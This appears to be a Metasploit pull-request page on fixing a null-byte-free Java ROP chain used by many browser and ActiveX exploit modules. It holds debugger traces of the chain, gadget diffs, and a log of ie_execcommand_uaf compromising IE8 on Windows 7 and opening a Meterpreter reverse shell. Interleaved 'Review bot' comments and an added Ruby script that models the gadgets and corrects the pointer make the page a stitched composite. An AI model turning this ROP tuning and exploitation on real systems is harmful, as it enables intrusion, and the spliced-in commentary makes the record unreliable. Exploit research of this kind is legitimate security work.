Update: Null Byte Free Java ROP #1613

Merged
merged 2 commits into from Mar 19, 2013


4 participants

@wchen-r7
Contributor

Our new heap spray routine does not like double nulls, so we need to adjust our ROP.

@sinn3r sinn3r Java ROP null-byte free
Our new heap spray routine does not like double nulls, so we need
to adjust our ROP.
ea4c88b
@jvazquez-r7
Contributor
  • Modules using RopDB with the java ROP:
adobe_flash_otf_font.rb:            p = generate_rop_payload('java', payload.encoded, {'pivot'=>pivot})
adobe_flashplayer_flash10o.rb:          p = generate_rop_payload('java', payload.encoded)
crystal_reports_printcontrol.rb:        rop_payload = generate_rop_payload('java', code, {'pivot' => [t['Pivot']].pack("V")})
ie_execcommand_uaf.rb:          rop_payload = generate_rop_payload('java', code, {'pivot'=>stack_pivot})
indusoft_issymbol_internationalseparator.rb:            rop_payload = generate_rop_payload('java', code, {'pivot'=>stack_pivot})
ms10_002_ie_object.rb:          rop_payload = generate_rop_payload('java', p)
ms11_050_mshtml_cobjectelement.rb:          rop_payload = generate_rop_payload('java', p)
ms11_081_option.rb:         rop_payload = generate_rop_payload('java', '')
ms12_037_same_id.rb:            rop = generate_rop_payload('java', '', {'pivot'=>pivot})
msxml_get_definition_code_exec.rb:              rop = generate_rop_payload('java','',{'pivot'=>adjust})
novell_groupwise_gwcls1_actvx.rb:               rop_payload = generate_rop_payload('java', '') # Mapped at 0x0c0c07ea
ntr_activex_check_bof.rb:               rop_payload = generate_rop_payload('java', code)
quickr_qp2_bof.rb:          rop_payload = generate_rop_payload('java', code)#, {'pivot'=>stack_pivot})
vlc_amv.rb:         code = generate_rop_payload('java', payload.encoded)
  • Tested with ie_execcommand_uaf.rb on IE8 / Windows 7 SP1, and it has stopped working:

Stackpivot is reached and the ROP is in the "new stack":

0:026> g
ModLoad: 718a0000 718f8000   C:\Program Files\Common Files\microsoft shared\ink\tiptsf.dll
Breakpoint 0 hit
eax=0c0c0c0c ebx=0000001f ecx=02ad1630 edx=0000000d esi=00000000 edi=0c0c0c08
eip=7c348b05 esp=02169d0c ebp=02169d20 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000206
MSVCR71!wparse_cmdline+0x40:
7c348b05 94              xchg    eax,esp
0:005> t
eax=02169d0c ebx=0000001f ecx=02ad1630 edx=0000000d esi=00000000 edi=0c0c0c08
eip=7c348b06 esp=0c0c0c0c ebp=02169d20 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000206
MSVCR71!wparse_cmdline+0x41:
7c348b06 c3              ret
0:005> t
eax=02169d0c ebx=0000001f ecx=02ad1630 edx=0000000d esi=00000000 edi=0c0c0c08
eip=7c347f98 esp=0c0c0c10 ebp=02169d20 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000206
MSVCR71!__onexitinit+0x17:
7c347f98 c3              ret
0:005> dd esp
0c0c0c10  7c347f97 7c348b05 7c364c66 7c364c66
0c0c0c20  7c344edc fffffdff 7c351e05 7c3536e3
0c0c0c30  ffffffff 7c345255 7c35218e 7c345937
0c0c0c40  ffffffc0 7c351eb1 7c36c5b9 7c391e67
0c0c0c50  7c342e58 7c34d202 7c34f8f4 7c3415a2
0c0c0c60  7c344edc 7c37a140 7c378c81 7c345c30
0c0c0c70  f254c481 e8fcffff 00000089 31e58960
0c0c0c80  528b64d2 0c528b30 8b14528b b70f2872
  • The ROP execution crashes after the PUSHAD, when trying to jmp to VirtualProtect:
0:005> t
eax=7c37a140 ebx=00000201 ecx=7c391e67 edx=00000040 esi=7c3415a2 edi=7c34d202
eip=7c378c81 esp=0c0c0c6c ebp=7c364c66 iopl=0         nv up ei pl nz na po cy
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000203
MSVCR71!Fill_FPIEEE_RECORD+0xbd:
7c378c81 60              pushad
0:005> t
eax=7c37a140 ebx=00000201 ecx=7c391e67 edx=00000040 esi=7c3415a2 edi=7c34d202
eip=7c378c82 esp=0c0c0c4c ebp=7c364c66 iopl=0         nv up ei pl nz na po cy
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000203
MSVCR71!Fill_FPIEEE_RECORD+0xbe:
7c378c82 04ef            add     al,0EFh
0:005> t
eax=7c37a12f ebx=00000201 ecx=7c391e67 edx=00000040 esi=7c3415a2 edi=7c34d202
eip=7c378c84 esp=0c0c0c4c ebp=7c364c66 iopl=0         nv up ei pl nz na po cy
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000203
MSVCR71!Fill_FPIEEE_RECORD+0xc0:
7c378c84 c3              ret
0:005> t
eax=7c37a12f ebx=00000201 ecx=7c391e67 edx=00000040 esi=7c3415a2 edi=7c34d202
eip=7c34d202 esp=0c0c0c50 ebp=7c364c66 iopl=0         nv up ei pl nz na po cy
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000203
MSVCR71!signal+0x1a0:
7c34d202 c3              ret
0:005> dd esp
0c0c0c50  7c3415a2 7c364c66 0c0c0c6c 00000201
0c0c0c60  00000040 7c391e67 7c37a140 7c345c30
0c0c0c70  f254c481 e8fcffff 00000089 31e58960
0c0c0c80  528b64d2 0c528b30 8b14528b b70f2872
0c0c0c90  ff31264a 3cacc031 2c027c61 0dcfc120
0c0c0ca0  f0e2c701 528b5752 3c428b10 408bd001
0c0c0cb0  74c08578 50d0014a 8b18488b d3012058
0c0c0cc0  8b493ce3 d6018b34 c031ff31 0dcfc1ac
0:005> t
eax=7c37a12f ebx=00000201 ecx=7c391e67 edx=00000040 esi=7c3415a2 edi=7c34d202
eip=7c3415a2 esp=0c0c0c54 ebp=7c364c66 iopl=0         nv up ei pl nz na po cy
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000203
MSVCR71!setSBUpLow+0x48:
7c3415a2 ff20            jmp     dword ptr [eax]      ds:0023:7c37a12f=777157aa
0:005> t
eax=7c37a12f ebx=00000201 ecx=7c391e67 edx=00000040 esi=7c3415a2 edi=7c34d202
eip=aa577177 esp=0c0c0c54 ebp=7c364c66 iopl=0         nv up ei pl nz na po cy
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000203
aa577177 ??              ???

My guess is that the new ROP hasn't taken into account the AL adjustment after PUSHAD:

+    <gadget offset="0x00004edc">POP EAX # RETN</gadget>
+    <gadget offset="0x0003a140">ptr to VirtualProtect()</gadget> <-- it hasn't into account the add al, 0ef after pushad
+    <gadget offset="0x00038c81">,PUSHAD # ADD AL,0EF # RETN</gadget>
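Review bot: the `ptr to VirtualProtect()` entry at 0x0003a140 is the raw IAT slot, but the gadget that follows runs ADD AL,0EF after PUSHAD, so by the time JMP [EAX] executes the low byte has wrapped (0x40 + 0xEF = 0x12F, AL = 0x2F) and the dereference hits 7c37a12f, exactly what the trace above shows before the crash. The pointer has to be pre-adjusted by 0x11 so the add restores it, i.e. `<gadget offset="0x0003a151">ptr to VirtualProtect()</gadget>` (0x51 + 0xEF wraps back to 0x40); 0x7c37a151 has no null byte, so nothing is lost for the null-free goal. The leading comma in `,PUSHAD # ADD AL,0EF # RETN` is also a stray character in the gadget description.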
@jvazquez-r7 jvazquez-r7 commented on an outdated diff Mar 19, 2013
data/ropdb/java.xml
<gadget offset="0x000015a2">JMP [EAX]</gadget>
- <gadget offset="0x000362fb">POP EAX # RETN</gadget>
- <gadget offset="0x0003a151">ptr to VirtualProtect()</gadget>
- <gadget offset="0x00038c81">PUSHAD # ADD AL,0EF # RETN</gadget>
- <gadget offset="0x00005c30">ptr to 'push esp # ret</gadget>
+ <gadget offset="0x00004edc">POP EAX # RETN</gadget>
+ <gadget offset="0x0003a140">ptr to VirtualProtect()</gadget>
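Review bot: the two `ptr to VirtualProtect()` values differ by exactly 0x11, the amount ADD AL,0EF adds before JMP [EAX], so the old 0x0003a151 was already the pre-adjusted pointer and the new 0x0003a140 is not; with MSVCR71 at 0x7c340000 neither value contains a null byte, so the swap is not needed for the null-free chain and 0x0003a151 should be kept. This view of the diff also removes the `PUSHAD # ADD AL,0EF # RETN` and `ptr to 'push esp # ret` (0x00005c30) entries without showing their replacements; the trace still has 7c345c30 right after the PUSHAD frame, so please confirm the full file keeps the POP EAX, pointer, PUSHAD, push esp # ret order.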
@jvazquez-r7
jvazquez-r7 Mar 19, 2013 Contributor

This new ROP is failing in my test. I guess this ptr hasn't taken into account the "ADD AL, 0EF" after the next pushad instruction. I think this ptr should be adjusted, as was done before:

<gadget offset="0x0003a151">ptr to VirtualProtect()</gadget>
@corelanc0d3r
Contributor

Also, the new dwSize might be a bit small: the value used to be 0x400, and went down to 0x201

<gadget value="0xfffffdff">0x00000201</gadget>
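Both points raised above (the pointer that must survive ADD AL,0EF, and the NEG-encoded dwSize) come down to a little arithmetic on the gadget semantics. The following Ruby is an added example, not code from this PR, from data/ropdb/java.xml or from Metasploit's RopDB: it models PUSHAD # ADD AL,0EF # RETN with the register values copied from the WinDbg trace in the thread, computes the pre-adjusted pointer, and checks which dwSize values can be carried as their two's-complement without a null byte. MSVCR71_BASE is taken from the trace; VIRTUAL_PROTECT is a made-up address standing in for the real kernel32 export.

```ruby
# Added example: models the MSVCR71.dll (JRE) ROP gadgets discussed in the PR.
# Not part of Metasploit. VIRTUAL_PROTECT is a hypothetical address.

MSVCR71_BASE    = 0x7c340000               # base seen in the WinDbg output
VP_IAT_SLOT     = MSVCR71_BASE + 0x3a140   # 'ptr to VirtualProtect()' (IAT slot)
VIRTUAL_PROTECT = 0x76b1c0de               # hypothetical kernel32!VirtualProtect
ADD_AL_IMM      = 0xef                     # from PUSHAD # ADD AL,0EF # RETN

# ADD AL, imm8 only rewrites the low byte of EAX (mod 256); nothing carries up.
def add_al(eax, imm8)
  (eax & 0xffffff00) | ((eax + imm8) & 0xff)
end

# Value to POP into EAX so that add_al(value, imm8) == target.
def pre_adjust(target, imm8)
  (target & 0xffffff00) | ((target - imm8) & 0xff)
end

# Constants that would contain null bytes are carried as -v and NEG'd at runtime.
def neg_encode(v)
  (-v) & 0xffffffff
end

def neg_decode(enc)
  (-enc) & 0xffffffff
end

# True when the little-endian packing of the dwords has no 0x00 byte.
def null_free?(dwords)
  !dwords.pack("V*").include?("\x00")
end

# Stack image PUSHAD leaves, lowest address first. The RETN that follows pops
# the saved EDI (so EDI must hold a RET gadget) and that RET pops ESI (JMP [EAX]).
PUSHAD_ORDER = %i[edi esi ebp esp ebx edx ecx eax].freeze

def pushad_frame(regs)
  PUSHAD_ORDER.map { |r| regs[r] }
end

# VirtualProtect's view of the stack once EDI and ESI have been popped:
# return address = saved EBP, then the four stdcall arguments.
def vp_args(frame)
  { ret: frame[2], lpAddress: frame[3], dwSize: frame[4],
    flNewProtect: frame[5], lpflOldProtect: frame[6] }
end

# Where JMP [EAX] lands after ADD AL,imm8 has mangled the popped EAX.
# `iat` maps the addresses known to hold a function pointer; anything else crashes.
def resolve_jmp_eax(eax_popped, imm8, iat)
  iat.fetch(add_al(eax_popped, imm8), :crash)
end

# Register state at the PUSHAD, copied from the WinDbg trace in the thread.
REGS_AT_PUSHAD = {
  eax: 0x7c37a140, ebx: 0x00000201, ecx: 0x7c391e67, edx: 0x00000040,
  esi: 0x7c3415a2, edi: 0x7c34d202, esp: 0x0c0c0c6c, ebp: 0x7c364c66
}.freeze

IAT = { VP_IAT_SLOT => VIRTUAL_PROTECT }.freeze

def fmt(v)
  v == :crash ? "crash" : format("0x%08x", v)
end

if __FILE__ == $0
  raw  = VP_IAT_SLOT
  adj  = pre_adjust(VP_IAT_SLOT, ADD_AL_IMM)
  puts "POP EAX #{fmt(raw)} -> JMP [#{fmt(add_al(raw, ADD_AL_IMM))}] -> #{fmt(resolve_jmp_eax(raw, ADD_AL_IMM, IAT))}"
  puts "POP EAX #{fmt(adj)} -> JMP [#{fmt(add_al(adj, ADD_AL_IMM))}] -> #{fmt(resolve_jmp_eax(adj, ADD_AL_IMM, IAT))}"
  p vp_args(pushad_frame(REGS_AT_PUSHAD))
  [0x400, 0x201, 0x401].each do |size|
    enc = neg_encode(size)
    puts format("dwSize 0x%x NEG-encodes to 0x%08x, null-free: %s", size, enc, null_free?([enc]))
  end
end
```

Running it shows the raw IAT pointer resolving through 0x7c37a12f (a crash, as in the trace) while the pre-adjusted 0x7c37a151 resolves through 0x7c37a140, and it reproduces the VirtualProtect argument frame (lpAddress 0x0c0c0c6c, dwSize 0x201, flNewProtect 0x40) seen at the `dd esp` after the PUSHAD. It also shows why 0x400 cannot be kept as-is: -0x400 is 0xfffffc00, whose low byte is null, whereas -0x201 (0xfffffdff) is clean; a larger size whose negation has no zero byte, such as 0x401 (0xfffffbff), would satisfy both the null-free and the "not too small" concerns.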

@wchen-r7
Contributor

Updated.

@jvazquez-r7
Contributor

Awesome!

Now it's working with the java payload again :)

msf exploit(ie_execcommand_uaf) > rexploit
[*] Reloading module...
[*] Exploit running as background job.

[*] Started reverse handler on 192.168.1.128:4444 
[*] Using URL: http://0.0.0.0:8080/i5HHtBAlI
[*]  Local IP: http://192.168.1.128:8080/i5HHtBAlI
[*] Server started.
msf exploit(ie_execcommand_uaf) > [*] 192.168.1.131    ie_execcommand_uaf - Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
[*] 192.168.1.131    ie_execcommand_uaf - Redirecting to ftexL.html
[*] 192.168.1.131    ie_execcommand_uaf - Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
[*] 192.168.1.131    ie_execcommand_uaf - Loading ftexL.html
[*] 192.168.1.131    ie_execcommand_uaf - Using JRE ROP
[*] 192.168.1.131    ie_execcommand_uaf - Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
[*] 192.168.1.131    ie_execcommand_uaf - Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
[*] 192.168.1.131    ie_execcommand_uaf - Loading ulWqNC.html
[*] 192.168.1.131    ie_execcommand_uaf - Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
[*] Sending stage (752128 bytes) to 192.168.1.131
[*] Meterpreter session 1 opened (192.168.1.128:4444 -> 192.168.1.131:49511) at 2013-03-19 19:18:35 +0100
[*] Session ID 1 (192.168.1.128:4444 -> 192.168.1.131:49511) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: iexplore.exe (824)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 2656

msf exploit(ie_execcommand_uaf) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > [+] Successfully migrated to process 

meterpreter > sysinfo
Computer        : WIN-RNJ7NBRK9L7
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32

Fixing a "comma typo" and merging

@jvazquez-r7 jvazquez-r7 merged commit be9d4ec into rapid7:master Mar 19, 2013

1 check passed

default The Travis build passed
@wchen-r7 wchen-r7 deleted the wchen-r7:java_rop_update branch Aug 22, 2016